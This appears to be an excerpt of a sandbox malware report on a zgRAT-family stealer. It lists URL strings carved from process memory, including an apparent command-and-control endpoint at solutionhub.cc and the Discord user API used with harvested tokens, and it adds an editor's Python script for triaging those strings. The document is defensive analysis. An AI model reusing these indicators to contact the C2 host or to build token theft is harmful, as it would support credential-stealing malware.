                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2656389564.0000021E0315F000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2656389564.0000021E0315F000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crtC
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2656389564.0000021E0315F000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crtv
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2656389564.0000021E0315F000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172931387.00000234D5A31000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2654235111.0000021E03061000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2674289019.0000021E0314A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2894652194.0000020E47C3F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.digicert.com/CPS0
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
                            Source: sys_updater.exe, 0000001F.00000003.2918254433.0000020E49495000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.m.
                            Source: explert.exe, 00000004.00000003.1712362816.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1712419900.0000000001407000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.cj
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
                            Source: MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002E61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.s
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002E61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5BB1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F3560000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E497F1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E49481000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5BB1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F3560000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E497F1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E49481000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/q
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5BB1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F3560000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E497F1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E49481000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.0v
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/v9/users/
                            Source: sys_updater.exe.26.dr String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                            Source: sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/$;
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/-;
                            Source: sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/2;
                            Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/8
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/;
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/;;
                            Source: sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/A;
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/O;.
                            Source: sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/T;
                            Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/U
                            Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/Z
                            Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/b
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/e;
                            Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/k
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/s;
                            Source: sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/socket/?id=5A9B846E0A19DD545B8CA4BF94E01DCEB8D04EDC07764AA4329CDB473E7FBAA3&u
                            Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc/~
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc:443/socket/
                            Source: sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc:443/socket/?id=5A9B846E0A19DD545B8CA4BF94E01DCEB8D04EDC07764AA4329CDB473E7FBA
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc:443/socket/b.cc/
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://solutionhub.cc:443/socket/nx8d.exe/
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.00000000030B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: GetRawInputDatamemstr_b40bcab2-3
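The URL strings above mix certificate CRL/OCSP endpoints and font-vendor metadata, which are present in almost any signed Windows binary, with the strings that matter for this sample: the solutionhub.cc `/socket/?id=` endpoint carried by explert.exe, IIZS2TRqf69aZbLAX3cf3edn.exe and sys_updater.exe, the api.ip.sb IP lookup and the Discord user API in MSBuild.exe. The Python script below is an example added by the editor, not part of the Joe Sandbox report or its tooling: it parses lines in the report's own "Source: ... String found in binary or memory: ..." format, extracts the host and the processes that held the string, and sorts hosts into buckets so the C2 is not buried under PKI noise. The noise and abused-service domain lists, the bucket names and the truncation heuristic are the editor's assumptions; the sample lines are copied from the report above.

```python
"""Triage of "String found in binary or memory" lines from a Joe Sandbox report.
Editor's added example, not Joe Sandbox code; the bucket names, the domain lists
and the truncation heuristic are the editor's assumptions, not report content."""
import re
from collections import defaultdict

# Hosts present in nearly every Windows sample: code-signing certificate CRL/OCSP
# URLs, embedded font metadata, OS telemetry (assumed noise list).
NOISE_DOMAINS = {
    "crl3.digicert.com", "crl4.digicert.com", "ocsp.digicert.com", "cacerts.digicert.com",
    "www.digicert.com", "ocsp.msocsp.com", "go.microsoft.com", "www.microsoft.com",
    "api.msn.com", "www.apache.org", "docs.rs", "www.fontbureau.com", "www.fonts.com",
    "www.founder.com.cn", "www.galapagosdesign.com", "www.goodfont.co.kr",
    "www.jiyu-kobo.co.jp", "www.sajatypeworks.com", "www.sakkal.com", "www.sandoll.co.kr",
    "www.tiro.com", "www.typography.net", "www.urwpp.de", "www.zhongyicts.com.cn",
    "www.carterandcone.com",
}
# Legitimate services that stealers routinely contact (assumed list and notes).
ABUSED_SERVICES = {
    "api.ip.sb": "public IP lookup, records the victim's egress address",
    "discord.com": "Discord user API, queried with harvested tokens",
}
LINE_RE = re.compile(r"Source:\s*(?P<src>.*?)\s*String found in binary or memory:\s*(?P<url>\S+)")
PROC_RE = re.compile(r"[\w.-]+?\.exe")                # process names inside the Source column
HOST_RE = re.compile(r"^https?://([A-Za-z0-9.-]+)")  # stops at ':', '/' or any carved junk
WELLFORMED = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$")


def parse_line(line):
    """Return (sorted process names, raw URL string) for one report line, else None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return sorted(set(PROC_RE.findall(m.group("src")))), m.group("url")

def host_of(raw):
    """Host part of a carved string; carved URLs are often truncated or carry trailing bytes."""
    m = HOST_RE.match(raw)
    return m.group(1).lower().rstrip(".") if m else None

def _related(host, known):
    # "ocsp.digicert.com0a" (trailing junk) and "api.ip.s" (truncated) both map to known.
    return host.startswith(known) or (len(host) >= 6 and known.startswith(host))

def classify(host):
    """Return (bucket, canonical host); 'review' is what the analyst has to look at."""
    for d in NOISE_DOMAINS:
        if _related(host, d):
            return "noise", d
    for d in ABUSED_SERVICES:
        if _related(host, d):
            return "abused-service", d
    if not WELLFORMED.match(host):
        return "fragment", host
    return "review", host

def triage(lines):
    """Group carved URLs by bucket and host, keeping which processes held each one."""
    out = defaultdict(lambda: defaultdict(lambda: {"processes": set(), "strings": set()}))
    for line in lines:
        parsed = parse_line(line)
        host = host_of(parsed[1]) if parsed else None
        if host is None:
            continue
        bucket, canon = classify(host)
        out[bucket][canon]["processes"].update(parsed[0])
        out[bucket][canon]["strings"].add(parsed[1])
    return {b: dict(hosts) for b, hosts in out.items()}

def report(buckets):
    """Text summary, review bucket first so the C2 is not buried under PKI noise."""
    lines = []
    for bucket in ("review", "abused-service", "fragment", "noise"):
        for host, e in sorted(buckets.get(bucket, {}).items()):
            why = ABUSED_SERVICES.get(host, "")
            lines.append(f"[{bucket}] {host} <- {', '.join(sorted(e['processes']))}"
                         + (f"  ({why})" if why else ""))
            if bucket == "review":
                lines.extend("    " + s for s in sorted(e["strings"]))
    return "\n".join(lines)

# Sample input: a representative subset of lines copied verbatim from the report above.
SAMPLE_LINES = [
    "Source: sys_updater.exe, 00000018.00000003.2650108761.0000021E02FCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microso(",
    "Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://ocsp.digicert.com0A",
    "Source: explert.exe, 00000004.00000003.1712362816.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cj",
    "Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.s",
    "Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip",
    "Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/",
    "Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd",
    "Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/U",
    "Source: sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc/socket/?id=5A9B846E0A19DD545B8CA4BF94E01DCEB8D04EDC07764AA4329CDB473E7FBAA3&u",
    "Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solutionhub.cc:443/socket/nx8d.exe/",
]

if __name__ == "__main__":
    print(report(triage(SAMPLE_LINES)))
```

Run as-is, the review bucket lists solutionhub.cc with all three processes that held it and the raw `/socket/` strings, which is the pivot an analyst wants first. A truncated string whose remaining characters still form a syntactically valid host, such as `www.microsoft.cj`, also lands in review, so that bucket still needs a human; the parser deliberately does not guess what a cut-off string was. Feeding a whole report export is a matter of replacing SAMPLE_LINES with the file's lines.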

                            System Summary

                            Source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
